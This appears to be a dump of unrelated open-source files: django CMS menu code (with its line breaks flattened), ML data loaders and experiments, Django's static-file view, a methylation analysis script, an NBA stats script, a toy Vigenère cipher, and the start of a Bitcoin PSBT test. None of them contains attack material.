home.pk: home_cut = True if (page.parent_id == home.pk or page.parent_id in home_children) and home_cut: page.home_cut_cache = True home_children.append(page.pk) if (page.pk == home.pk and home.in_navigation) or page.pk != home.pk: first = False ids.append(page.id) titles = list(get_title_queryset(request).filter(page__in=ids, language=lang)) for page in pages:# add the title and slugs and some meta data for title in titles: if title.page_id == page.pk: if not hasattr(page, "title_cache"): page.title_cache = {} page.title_cache[title.language] = title nodes.append(page_to_node(page, home, home_cut)) ids.remove(page.pk) if ids: # get fallback languages fallbacks = get_fallback_languages(lang) for l in fallbacks: titles = list(get_title_queryset(request).filter(page__in=ids, language=l)) for title in titles: for page in pages:# add the title and slugs and some meta data if title.page_id == page.pk: if not hasattr(page, "title_cache"): page.title_cache = {} page.title_cache[title.language] = title 
nodes.append(page_to_node(page, home, home_cut)) ids.remove(page.pk) break if not ids: break return nodes menu_pool.register_menu(CMSMenu) class NavExtender(Modifier): def modify(self, request, nodes, namespace, root_id, post_cut, breadcrumb): if post_cut: return nodes exts = [] # rearrange the parent relations home = None for node in nodes: if node.attr.get("is_home", False): home = node extenders = node.attr.get("navigation_extenders", None) if extenders: for ext in extenders: if not ext in exts: exts.append(ext) for n in nodes: if n.namespace == ext and not n.parent_id:# if home has nav extenders but home is not visible if node.attr.get("is_home", False) and not node.visible: n.parent_id = None n.parent_namespace = None n.parent = None else: n.parent_id = node.id n.parent_namespace = node.namespace n.parent = node node.children.append(n) removed = [] # find all not assigned nodes for menu in menu_pool.menus.items(): if hasattr(menu[1], 'cms_enabled') and menu[1].cms_enabled and not menu[0] in exts: for node in nodes: if node.namespace == menu[0]: removed.append(node) if breadcrumb: # if breadcrumb and home not in navigation add node if breadcrumb and home and not home.visible: home.visible = True if request.path == home.get_absolute_url(): home.selected = True else: home.selected = False # remove all nodes that are nav_extenders and not assigned for node in removed: nodes.remove(node) return nodes menu_pool.register_modifier(NavExtender) class SoftRootCutter(Modifier): """ If anyone understands this, PLEASE write a meaningful description here! """ def modify(self, request, nodes, namespace, root_id, post_cut, breadcrumb): # only apply this modifier if we're pre-cut (since what we do is cut) if post_cut or not settings.CMS_SOFTROOT: return nodes selected = None root_nodes = [] # find the selected node as well as all the root nodes for node in nodes: if node.selected: selected = node if not node.parent: root_nodes.append(node) # if we found a selected ... if selected: # and the selected is a softroot if selected.attr.get("soft_root", False): # get it's descendants nodes = selected.get_descendants() # remove the link to parent selected.parent = None # make the selected page the root in the menu nodes = [selected] + nodes else: # if it's not a soft root, walk ancestors (upwards!) nodes = self.find_ancestors_and_remove_children(selected, nodes) # remove child-softroots from descendants (downwards!) nodes = self.find_and_remove_children(selected, nodes) else: # for all nodes in root, remove child-sofroots (downwards!) for node in root_nodes: self.find_and_remove_children(node, nodes) return nodes def find_and_remove_children(self, node, nodes): for n in node.children: if n.attr.get("soft_root", False): self.remove_children(n, nodes) return nodes def remove_children(self, node, nodes): for n in node.children: nodes.remove(n) self.remove_children(n, nodes) node.children = [] def find_ancestors_and_remove_children(self, node, nodes): """ Check ancestors of node for soft roots """ if node.parent: if node.parent.attr.get("soft_root", False): nodes = node.parent.get_descendants() node.parent.parent = None nodes = [node.parent] + nodes else: nodes = self.find_ancestors_and_remove_children(node.parent, nodes) else: for n in nodes: if n != node and not n.parent: self.find_and_remove_children(n, nodes) for n in node.children: if n != node: self.find_and_remove_children(n, nodes) return nodes menu_pool.register_modifier(SoftRootCutter) # vim:ai:et:ts=4:sw=4:sts=4:ff=unix:fenc=utf8:
the-stack_106_24333
MIN_BATCH = 5
LOSS_V = .5              # v loss coefficient
LOSS_ENTROPY = .01       # entropy coefficient
LEARNING_RATE = 5e-3
RMSPropDecaly = 0.99

# Params of advantage (Bellman equation)
GAMMA = 0.99
N_STEP_RETURN = 5
GAMMA_N = GAMMA ** N_STEP_RETURN

TRAIN_WORKERS = 10    # Thread number of learning.
TEST_WORKER = 1       # Thread number of testing (default 1)
MAX_STEPS = 20        # Maximum step number.
MAX_TRAIN_NUM = 5000  # Learning number of each thread.
Tmax = 5              # Updating step period of each thread.

# Params of epsilon greedy
EPS_START = 0.5
EPS_END = 0.0
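
# --- Illustrative sketch (editor addition, not part of the original file).
# Shows how GAMMA, N_STEP_RETURN and GAMMA_N would typically combine in an
# n-step discounted return R_t = r_t + GAMMA*r_{t+1} + ... + GAMMA_N*V(s_{t+n});
# the reward list and bootstrap value below are made-up numbers.
def n_step_return(rewards, bootstrap_value):
    # rewards: up to N_STEP_RETURN rewards; bootstrap_value: V(s_{t+n})
    ret = 0.0
    for i, r in enumerate(rewards[:N_STEP_RETURN]):
        ret += (GAMMA ** i) * r
    return ret + GAMMA_N * bootstrap_value


# example call: n_step_return([1.0, 0.0, 0.0, 1.0, 0.0], 0.5)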
the-stack_106_24335
import torch
from torchvision import datasets, transforms
from torch.utils.data import random_split


def data_generator(root, batch_size):
    train_set = datasets.MNIST(root=root, train=True, download=True,
                               transform=transforms.Compose([
                                   transforms.ToTensor(),
                                   transforms.Normalize((0.1307,), (0.3081,))
                               ]))
    train_set, val_set = random_split(train_set, [50000, 10000],)  # generator=torch.Generator().manual_seed(42))
    test_set = datasets.MNIST(root=root, train=False, download=True,
                              transform=transforms.Compose([
                                  transforms.ToTensor(),
                                  transforms.Normalize((0.1307,), (0.3081,))
                              ]))

    print(f"train: {len(train_set)}\tval: {len(val_set)}\ttest: {len(test_set)}")

    train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, num_workers=12)
    val_loader = torch.utils.data.DataLoader(val_set, batch_size=batch_size, num_workers=12)
    test_loader = torch.utils.data.DataLoader(test_set, batch_size=batch_size, num_workers=12)
    return train_loader, val_loader, test_loader


def count_model_params(model):
    """
    Returns number of trainable and non-trainable parameters in a model.

    :param model: A PyTorch nn.Module object.
    :return: A tuple (train_params_count, non_train_params_count)
    """
    train_params_count = 0
    non_train_params_count = 0

    for p in model.parameters():
        if p.requires_grad:
            train_params_count += p.numel()
        else:
            non_train_params_count += p.numel()

    return train_params_count, non_train_params_count
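
# --- Illustrative usage sketch (editor addition, not part of the original file).
# The "./data" root, batch size and toy model are assumptions for demonstration.
if __name__ == "__main__":
    import torch.nn as nn

    train_loader, val_loader, test_loader = data_generator(root="./data", batch_size=64)
    model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))
    trainable, frozen = count_model_params(model)
    print(f"trainable: {trainable}, frozen: {frozen}")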
the-stack_106_24336
# this file contains code for a permuted graph topologies experiment
# (we permute columns and rows of the adjacency matrix and check the
# resulting neural networks fits)

import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.model_selection import train_test_split
import os

import graph_utils as graph_utils
import graph_neural_networks as graph_nn
import data_preparation_utils as data_prep
from iterative_updaters import VanillaGradientDescent, MomentumGradientDescent, NesterovMomentumGradientDescent, RMSPropGradientDescent, AdamGradientDescent
import training_and_evaluation as train_eval
import graph_nn_experiments as experiments

os.environ['CUDA_VISIBLE_DEVICES'] = '-1'  # comment this line out when the GPU is supposed to be used

if tf.test.gpu_device_name():
    print('GPU found')
else:
    print("No GPU found")

if __name__ == '__main__':
    ochota_adj_matrix = np.genfromtxt("macierz_sasiedztwa.txt")
    print("Loaded adjacency matrix")

    toy_data = pd.read_csv("toy_set.csv", header=None)
    print("Read datafile")

    X, y, X_scaler, y_scaler = data_prep.scale_standard_traffic_light_data(toy_data)
    print("Scaled the data")

    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=831191)
    print("Divided the data into train/test sets")

    numbers_of_transpositions = list(range(22))
    no_of_samples = 100
    numbers_of_transpositions *= no_of_samples

    file_to_save_results = "toy_permuted_topologies_0.csv"
    with open(file_to_save_results, "a") as f:
        for i in numbers_of_transpositions:
            print("Constructing random adjacency matrix with %d transpositions" % i)
            random_permutation = graph_utils.generate_random_permutation_with_approx_no_of_transpositions(21, i)
            random_adj_matrix = ochota_adj_matrix[random_permutation][:, random_permutation]
            symmetric_diff = graph_utils.undirected_symmetric_difference(random_adj_matrix, ochota_adj_matrix)

            tf.reset_default_graph()
            nn_input = tf.placeholder(dtype=tf.float32, shape=[None, 21])
            targets = tf.placeholder(dtype=tf.float32, shape=[None, 1])

            print("Constructing graph neural net")
            nn_output = graph_nn.transfer_matrix_neural_net(nn_input, 3, 4, tf.nn.tanh, random_adj_matrix, verbose=False)
            optimizer = tf.train.AdamOptimizer(0.005)
            batch_iterator = data_prep.BatchIterator(X_train, y_train, 997)

            print("Training network with symmetric diff %d" % symmetric_diff)
            test_and_batch_losses = train_eval.train_model(nn_output, nn_input, targets, optimizer, 100000,
                                                           batch_iterator, X_test, y_test,
                                                           "trained_networks/toy_permuted_model_tmp.ckpt", 1000,
                                                           verbose=True)
            test_loss = test_and_batch_losses[-1][0]
            model_avg_error, actual_vs_predicted = train_eval.evaluate_model_on_a_dataset(
                "trained_networks/toy_permuted_model_tmp.ckpt", nn_output, nn_input, X_test, y_test, y_scaler)
            test_loss = test_and_batch_losses[-1][0]

            f.write("%d,%f\n" % (i, test_loss))
            f.flush()
            print((i, symmetric_diff, test_loss))
            # old version with error, symmetric diff missing here
            # print((i, test_loss))
            # old version, no good for this toy problem:
            # f.write("%d,%d,%f,%f\n" % (i, symmetric_diff, model_avg_error, test_loss))
            # f.flush()
            # print((symmetric_diff, model_avg_error, test_loss))
    f.close()
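
# --- Illustrative sketch (editor addition, not part of the original experiment).
# graph_utils.generate_random_permutation_with_approx_no_of_transpositions is a
# project-specific helper whose implementation is not shown here; this
# hypothetical stand-in only illustrates the underlying idea: compose a given
# number of random transpositions and apply them to rows and columns of the
# adjacency matrix.
def _random_permutation_with_transpositions(n, no_of_transpositions, rng=np.random):
    perm = np.arange(n)
    for _ in range(no_of_transpositions):
        a, b = rng.choice(n, size=2, replace=False)
        perm[a], perm[b] = perm[b], perm[a]
    return perm


# example: adj = np.eye(5); p = _random_permutation_with_transpositions(5, 2)
# permuted = adj[p][:, p]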
the-stack_106_24337
##
## data_loader.py
## Load in brick/ball/cylinder examples for programming challenge.
##

import numpy as np
from easydict import EasyDict
import glob
import cv2


def data_loader(label_indices, channel_means, train_test_split=0.7,
                input_image_size=(227, 227), data_path='../data'):
    '''
    Load, resize, subtract mean, and store data in easydicts.
    '''
    num_classes = len(label_indices)

    # Convert channel means list to array
    channel_means = np.array(channel_means)

    # Pull in image filenames:
    im_paths = glob.glob(data_path + '/*/*.jpg')

    # Train test split
    num_training_examples = int(np.round(train_test_split * len(im_paths)))
    num_testing_examples = len(im_paths) - num_training_examples

    random_indices = np.arange(len(im_paths))
    np.random.shuffle(random_indices)
    training_indices = random_indices[:num_training_examples]
    testing_indices = random_indices[num_training_examples:]

    # Make easydicts for data
    data = EasyDict()
    data.train = EasyDict()
    data.test = EasyDict()

    # Make empty arrays to hold data:
    data.train.X = np.zeros((num_training_examples, input_image_size[0], input_image_size[1], 3), dtype='float32')
    data.train.y = np.zeros((num_training_examples, num_classes), dtype='float32')

    data.test.X = np.zeros((num_testing_examples, input_image_size[0], input_image_size[1], 3), dtype='float32')
    data.test.y = np.zeros((num_testing_examples, num_classes), dtype='float32')

    for count, index in enumerate(training_indices):
        im = cv2.imread(im_paths[index])
        im = cv2.resize(im, (input_image_size[1], input_image_size[0]))
        data.train.X[count, :, :, :] = im - channel_means
        class_name = im_paths[index].split('/')[-2]
        data.train.y[count, label_indices[class_name]] = 1

    for count, index in enumerate(testing_indices):
        im = cv2.imread(im_paths[index])
        im = cv2.resize(im, (input_image_size[1], input_image_size[0]))
        data.test.X[count, :, :, :] = im - channel_means
        class_name = im_paths[index].split('/')[-2]
        data.test.y[count, label_indices[class_name]] = 1

    print('Loaded', str(len(training_indices)), 'training examples and ',
          str(len(testing_indices)), 'testing examples. ')

    return data
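
# --- Illustrative usage sketch (editor addition, not part of the original file).
# The label indices and channel means below are placeholders, not values taken
# from the challenge data.
if __name__ == '__main__':
    label_indices = {'brick': 0, 'ball': 1, 'cylinder': 2}
    channel_means = [93.6, 99.5, 106.6]   # example BGR means, not measured values
    data = data_loader(label_indices, channel_means, data_path='../data')
    print(data.train.X.shape, data.train.y.shape)
    print(data.test.X.shape, data.test.y.shape)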
the-stack_106_24338
#! /usr/bin/env python
# -*- coding:UTF-8 -*-

"""
Views and functions for serving static files. These are only to be used
during development, and SHOULD NOT be used in a production setting.
"""
import mimetypes
import os
import posixpath
import re
import stat

from django.http import (
    FileResponse, Http404, HttpResponse, HttpResponseNotModified,
)
from django.template import Context, Engine, TemplateDoesNotExist, loader
from django.utils._os import safe_join
from django.utils.http import http_date, parse_http_date
from django.utils.translation import gettext as _, gettext_lazy


def serve(request, path, document_root=None, show_indexes=False):
    """
    Serve static files below a given point in the directory structure.

    To use, put a URL pattern such as::

        from django.views.static import serve

        url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'})

    in your URLconf. You must provide the ``document_root`` param. You may
    also set ``show_indexes`` to ``True`` if you'd like to serve a basic index
    of the directory.  This index view will use the template hardcoded below,
    but if you'd like to override it, you can create a template called
    ``static/directory_index.html``.
    """
    path = posixpath.normpath(path).lstrip('/')
    fullpath = safe_join(document_root, path)
    if os.path.isdir(fullpath):
        if show_indexes:
            return directory_index(path, fullpath)
        raise Http404(_("Directory indexes are not allowed here."))
    if not os.path.exists(fullpath):
        raise Http404(_('"%(path)s" does not exist') % {'path': fullpath})
    # Respect the If-Modified-Since header.
    statobj = os.stat(fullpath)
    if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
                              statobj.st_mtime, statobj.st_size):
        return HttpResponseNotModified()
    content_type, encoding = mimetypes.guess_type(fullpath)
    content_type = content_type or 'application/octet-stream'
    response = FileResponse(open(fullpath, 'rb'), content_type=content_type)
    response["Last-Modified"] = http_date(statobj.st_mtime)
    if stat.S_ISREG(statobj.st_mode):
        response["Content-Length"] = statobj.st_size
    if encoding:
        response["Content-Encoding"] = encoding
    return response


DEFAULT_DIRECTORY_INDEX_TEMPLATE = """
{% load i18n %}
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta http-equiv="Content-Language" content="en-us" />
    <meta name="robots" content="NONE,NOARCHIVE" />
    <title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title>
  </head>
  <body>
    <h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1>
    <ul>
      {% if directory != "/" %}
      <li><a href="../">../</a></li>
      {% endif %}
      {% for f in file_list %}
      <li><a href="{{ f|urlencode }}">{{ f }}</a></li>
      {% endfor %}
    </ul>
  </body>
</html>
"""
template_translatable = gettext_lazy("Index of %(directory)s")


def directory_index(path, fullpath):
    try:
        t = loader.select_template([
            'static/directory_index.html',
            'static/directory_index',
        ])
    except TemplateDoesNotExist:
        t = Engine(libraries={'i18n': 'django.templatetags.i18n'}).from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE)
        c = Context()
    else:
        c = {}
    files = []
    for f in os.listdir(fullpath):
        if not f.startswith('.'):
            if os.path.isdir(os.path.join(fullpath, f)):
                f += '/'
            files.append(f)
    c.update({
        'directory': path + '/',
        'file_list': files,
    })
    return HttpResponse(t.render(c))


def was_modified_since(header=None, mtime=0, size=0):
    """
    Was something modified since the user last downloaded it?

    header
      This is the value of the If-Modified-Since header.  If this is None,
      I'll just return True.

    mtime
      This is the modification time of the item we're talking about.

    size
      This is the size of the item we're talking about.
    """
    try:
        if header is None:
            raise ValueError
        matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header,
                           re.IGNORECASE)
        header_mtime = parse_http_date(matches.group(1))
        header_len = matches.group(3)
        if header_len and int(header_len) != size:
            raise ValueError
        if int(mtime) > header_mtime:
            raise ValueError
    except (AttributeError, ValueError, OverflowError):
        return True  # modified
    return False
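
# --- Illustrative usage sketch (editor addition, not part of the original module).
# A development-only URLconf entry wiring `serve` up under /media/, following the
# pattern described in the docstring; MEDIA_ROOT is assumed to be configured in
# the project's settings.
#
#     from django.conf import settings
#     from django.conf.urls import url
#     from django.views.static import serve
#
#     urlpatterns = [
#         url(r'^media/(?P<path>.*)$', serve,
#             {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),
#     ]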
the-stack_106_24340
from operator import itemgetter

cancerlist = ["ACC", "BLCA", "BRCA", "CESC", "CHOL", "COAD", "DLBC", "ESCA", "GBM", "HNSC", "KICH", "KIRC",
              "KIRP", "LGG", "LIHC", "LUAD", "LUSC", "MESO", "OV", "PAAD", "PCPG", "PRAD", "READ", "SARC",
              "SKCM", "STAD", "TGCT", "THCA", "THYM", "UCEC", "UCS", "UVM"]
# cancerlist = ["PANCANCER"]

input_file1 = []
input_file2 = []

probe_count = 485577
p_threshold = [0.05, 0.005, 0.0005, 0.0000001]

sample_id = []
cytoact = []
sample_index = []


def GetSample():
    cytoact_file = open("TCGA_methylation_cowork_1.txt", 'r')
    header = cytoact_file.readline().split()    # getting header

    id_posit = header.index("id")               # sample ID positioning
    cytoact_posit = header.index("CytAct")      # CytAct positioning

    cytodata = cytoact_file.readlines()         # read data table
    cytoact_file.close()

    count = 0
    global sample_id
    global cytoact

    for line in cytodata:
        line = line.split()
        sample_id.append(line[id_posit].replace('_', ''))   # sample ID extraction
        cytoact.append(float(line[cytoact_posit]))          # CytAct extraction
        count += 1

    return count    # Sample number return


sample_number = GetSample()
percentage = [0.01, 0.025, 0.05, 0.1, 0.125, 0.15, 0.175, 0.2, 0.225, 0.25, 0.275, 0.3]

for i in range(0, len(cancerlist)):
    input_tumor = open(cancerlist[i] + ".humanmethylation450.tumor.txt", 'r')
    sample_header1 = input_tumor.readline().split()    # sample line
    input_tumor.readline()                              # junk line

    ############################################################################
    # make sample index table
    del sample_header1[0]
    del sample_header1[0]
    sample_index = []
    sample_binary_table = []
    length = len(sample_header1)

    for j in range(0, length):
        sample_header1[j] = sample_header1[j][:15].replace('-', '')
        if(sample_header1[j] in sample_id):
            sample_index.append(sample_id.index(sample_header1[j]))
        else:
            sample_index.append(-1)

    for j in range(len(p_threshold)):
        sample_binary_table.append([])
        for k in range(len(percentage)):
            sample_binary_table[j].append([])
            for l in range(length):
                sample_binary_table[j][k].append(0)
    ############################################################################

    whole_skew = []
    whole_skew_index = []

    for j in range(len(p_threshold)):
        input_file = open(str(p_threshold[j]) + "." + cancerlist[i] + ".CpGsites.By.TTest.txt", 'r')
        input_file.readline()    # junk line
        whole_skew.append([])

        lines = input_file.readlines()
        for line in lines:    # Derivation of meaningful CpG sites
            line = line.split()
            t_stat = float(line[1])
            whole_skew[j].append(line[0])

        whole_skew[j].append("END_POINT")
        whole_skew_index.append(0)

    for j in range(probe_count):
        line1 = input_tumor.readline().split()
        site_id = line1.pop(0)

        ########################################################################
        # getting betavalue for each cpg site
        betavalue_row = []
        new_length = length

        for k in range(0, length):
            if(line1[k] == "NA"):
                new_length -= 1
                continue
            betavalue_row.append([float(line1[k]), k])

        betavalue_row.sort(key=itemgetter(0))
        ########################################################################

        if(new_length > 0):
            for k in range(len(p_threshold)):
                if(whole_skew[k][whole_skew_index[k]] == site_id):
                    for percentage_i in range(len(percentage)):
                        threshold = int(new_length * percentage[percentage_i])
                        for l in range(threshold):
                            sample_binary_table[k][percentage_i][betavalue_row[new_length - l - 1][1]] += 1
                        for l in range(threshold):
                            sample_binary_table[k][percentage_i][betavalue_row[l][1]] += 1
                    whole_skew_index[k] += 1

        if(j % 10000 == 0):
            print(cancerlist[i] + " %d completed." % j)

    for j in range(len(p_threshold)):
        for k in range(len(percentage)):
            output_file = open("Pvalue." + str(p_threshold[j]) + ".Percentage." + str(percentage[k]) + "." + cancerlist[i] + ".Both.MeaningfulCpGsites.By.Ttest_Binarization.Summation.txt", 'w')
            for l in range(length):
                printline = sample_header1[l] + "\t%s\n" % str(sample_binary_table[j][k][l])
                output_file.write(printline)
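
# --- Illustrative sketch (editor addition, not part of the original script).
# Condenses the per-site binarization above: for one CpG site, the samples whose
# beta values fall in the top or bottom `fraction` of the non-NA distribution
# have their counters incremented. Toy values only.
def _mark_extremes(betavalues, fraction):
    ranked = sorted((b, idx) for idx, b in enumerate(betavalues) if b is not None)
    cut = int(len(ranked) * fraction)
    low = [idx for _, idx in ranked[:cut]]
    high = [idx for _, idx in ranked[len(ranked) - cut:]]
    return low + high


# _mark_extremes([0.1, 0.9, None, 0.5, 0.2], 0.25)  -> indices of extreme samples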
the-stack_106_24343
import pandas as pd
import matplotlib as plt


def teamSearch(teamName):
    teams = pd.read_html("https://en.wikipedia.org/wiki/Wikipedia:WikiProject_National_Basketball_Association/National_Basketball_Association_team_abbreviations", header=0)
    team_names = pd.DataFrame(columns=["Abbreviation/Acronym", "Franchise"])
    team_names = team_names.append(teams)
    for row in team_names.itertuples(index=False, name="Pandas"):
        if row[1] == teamName:
            teamName = row[0]
            break
    return teamName


# def main():
#     stats = pd.read_csv("https://rotogrinders.com/projected-stats/nba-player.csv?site=fanduel", delimiter=",", header=None, names=["Name", "Salary", "Team", "Position", "Opposing", "Ceiling", "Floor", "Points"])
#
#     for row in stats.itertuples(index = False, name = "Pandas"):
#         row[0].strip().title()
#
#     searchType = input("Search by team name or player name? (team/player) ").title()
#     if searchType == "Player":
#         player = input("Which player? ").strip()
#         for row in stats.itertuples(index = False, name = "Pandas"):
#             if row[0] == player:
#                 print(row)
#                 break
#     elif searchType == "Team":
#         team = input("Which team? ")
#         team = teamSearch(team)
#         for row in stats.itertuples(index = False, name = "Pandas"):
#             if row[2] == team:
#                 print(row)


def main():
    stats = pd.read_csv("https://rotogrinders.com/projected-stats/nba-player.csv?site=fanduel", delimiter=",",
                        header=None, names=["Name", "Salary", "Team", "Position", "Opposing", "Ceiling", "Floor", "Points"])

    for row in stats.itertuples(index=False, name="Pandas"):
        row[0].strip().title()

    stats.plot(x="Floor", y="Ceiling")
    print("plotted")


main()
the-stack_106_24344
import codecs

alphabet = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZzАаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфЦцЧчШшЩщХхЬьЪъЫыЭэЮюЯяΨ&Ǻλ∆0123456789!•−⋅→.—"‘±’,/\?%#@^$*+-_– №:;©‐[]=|(){}<>«»\r\n\ufeff\t'
filename = "hello.txt"
file_alphabet = "alphabet.txt"

m = []
word_mass = []
word_size = []
index_word = []
index_key = []
secret = []
secret_word = []
test = []
test2 = []
no_found = []
k = 0
h = 0
z1 = 0
z2 = 0
u = '\n\r\ufeff'

numb = int(input("1) Input from keyboard \n" + "2) Read from file \n"))
key = input("key: ")

if numb == 1:
    word = input("message: ")
    v = 0
if numb == 2:
    with codecs.open(filename, 'r', encoding="utf8") as file:  # --> the file must be saved in UTF-8 encoding
        word_txt = file.readlines()
    for i in range(0, len(word_txt)):
        word_size.append(word_txt[i])
    print("message: ", word_size)
    word = ''.join(word_size)

with codecs.open(file_alphabet, 'r', encoding="utf8") as file:  # --> the file must be saved in UTF-8 encoding
    f_alphabet = file.readlines()
for i in range(0, len(f_alphabet)):
    test2.append(f_alphabet[i])

########################################################################
for i in range(0, len(word)):
    test.append(word[i])
########################################################################

c = 0
for j in range(0, len(test)):
    for i in range(0, len(alphabet)):
        if test[j] == alphabet[i]:
            c += 1

number = int(input(" 1) Encrypt \n" + " 2) Decrypt \n"))

########################################################################
for i in range(0, len(test)):
    m.append(0)
    secret.append(0)
    secret_word.append(0)
    word_mass.append(test[i])

for i in range(0, len(test)):
    k = k + 1
    m[i] = key[k - 1]
    if k == len(key):
        k = 0
print(m)

for i in range(0, len(test)):
    for j in range(0, len(alphabet)):
        if test[i] == alphabet[j]:
            index_word.append(j)
            z1 += 1
        if m[i] == alphabet[j]:
            index_key.append(j)
            z2 += 1
    if z1 != z2:
        print("error")
        h = 1
        break
    if number == 1:
        secret[i] = index_word[i] + index_key[i]  # for encryption use +, for decryption use -
        if secret[i] >= len(alphabet):
            secret[i] = secret[i] - len(alphabet)  # for encryption: secret - len(alphabet); for decryption: secret + len(alphabet) - index_key
        secret_word[i] = alphabet[secret[i]]
    if number == 2:
        secret[i] = index_word[i] - index_key[i]
        if secret[i] >= len(alphabet):
            secret[i] = secret[i] + len(alphabet) - index_key[i]
        secret_word[i] = alphabet[secret[i]]

if h == 1:
    print(" z1 = ", z1, "\nz2 = ", z2)
    print(" no found: " + word_mass[z2 - 1])
    with codecs.open(file_alphabet, 'a', encoding='utf8') as file:  # --> write to the text file
        file.write(word_mass[z2 - 1])
else:
    s = ''.join(secret_word)  # --> convert the list to a string
    print(s)
    with codecs.open(filename, 'w', encoding='utf8') as file:  # --> write to the text file
        file.write(s)
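
# --- Illustrative sketch (editor addition, not part of the original script).
# The script above is essentially a Vigenere cipher over a custom alphabet:
# encryption adds key indices modulo the alphabet length, decryption subtracts
# them. A compact, self-contained version of that arithmetic:
def _vigenere(text, key, alphabet, encrypt=True):
    out = []
    for i, ch in enumerate(text):
        shift = alphabet.index(key[i % len(key)])
        pos = alphabet.index(ch)
        pos = (pos + shift) % len(alphabet) if encrypt else (pos - shift) % len(alphabet)
        out.append(alphabet[pos])
    return ''.join(out)


# round-trip example over a small alphabet:
# c = _vigenere("hello", "key", "abcdefghijklmnopqrstuvwxyz", encrypt=True)
# _vigenere(c, "key", "abcdefghijklmnopqrstuvwxyz", encrypt=False) == "hello"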
the-stack_106_24345
#!/usr/bin/env python3 # Copyright (c) 2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test the Partially Signed Transaction RPCs. """ from test_framework.test_framework import BitcoinTestFramework from test_framework.util import assert_equal, assert_raises_rpc_error, find_output, disconnect_nodes, connect_nodes_bi, sync_blocks import json import os MAX_BIP125_RBF_SEQUENCE = 0xfffffffd # Create one-input, one-output, no-fee transaction: class PSBTTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = False self.num_nodes = 3 def skip_test_if_missing_module(self): self.skip_if_no_wallet() def test_utxo_conversion(self): mining_node = self.nodes[2] offline_node = self.nodes[0] online_node = self.nodes[1] # Disconnect offline node from others disconnect_nodes(offline_node, 1) disconnect_nodes(online_node, 0) disconnect_nodes(offline_node, 2) disconnect_nodes(mining_node, 0) # Mine a transaction that credits the offline address offline_addr = offline_node.getnewaddress(address_type="p2sh-segwit") online_addr = online_node.getnewaddress(address_type="p2sh-segwit") online_node.importaddress(offline_addr, "", False) mining_node.sendtoaddress(address=offline_addr, amount=1.0) mining_node.generate(nblocks=1) sync_blocks([mining_node, online_node]) # Construct an unsigned PSBT on the online node (who doesn't know the output is Segwit, so will include a non-witness UTXO) utxos = online_node.listunspent(addresses=[offline_addr]) raw = online_node.createrawtransaction([{"txid":utxos[0]["txid"], "vout":utxos[0]["vout"]}],[{online_addr:0.9999}]) psbt = online_node.walletprocesspsbt(online_node.converttopsbt(raw))["psbt"] assert("non_witness_utxo" in mining_node.decodepsbt(psbt)["inputs"][0]) # Have the offline node sign the PSBT (which will update the UTXO to segwit) signed_psbt = offline_node.walletprocesspsbt(psbt)["psbt"] assert("witness_utxo" in mining_node.decodepsbt(signed_psbt)["inputs"][0]) # Make sure we can mine the resulting transaction txid = mining_node.sendrawtransaction(mining_node.finalizepsbt(signed_psbt)["hex"]) mining_node.generate(1) sync_blocks([mining_node, online_node]) assert_equal(online_node.gettxout(txid,0)["confirmations"], 1) # Reconnect connect_nodes_bi(self.nodes, 0, 1) connect_nodes_bi(self.nodes, 0, 2) def run_test(self): # Create and fund a raw tx for sending 10 BTC psbtx1 = self.nodes[0].walletcreatefundedpsbt([], {self.nodes[2].getnewaddress():10})['psbt'] # Node 1 should not be able to add anything to it but still return the psbtx same as before psbtx = self.nodes[1].walletprocesspsbt(psbtx1)['psbt'] assert_equal(psbtx1, psbtx) # Sign the transaction and send signed_tx = self.nodes[0].walletprocesspsbt(psbtx)['psbt'] final_tx = self.nodes[0].finalizepsbt(signed_tx)['hex'] self.nodes[0].sendrawtransaction(final_tx) # Create p2sh, p2wpkh, and p2wsh addresses pubkey0 = self.nodes[0].getaddressinfo(self.nodes[0].getnewaddress())['pubkey'] pubkey1 = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['pubkey'] pubkey2 = self.nodes[2].getaddressinfo(self.nodes[2].getnewaddress())['pubkey'] p2sh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "legacy")['address'] p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "bech32")['address'] p2sh_p2wsh = self.nodes[1].addmultisigaddress(2, [pubkey0, pubkey1, pubkey2], "", "p2sh-segwit")['address'] p2wpkh = 
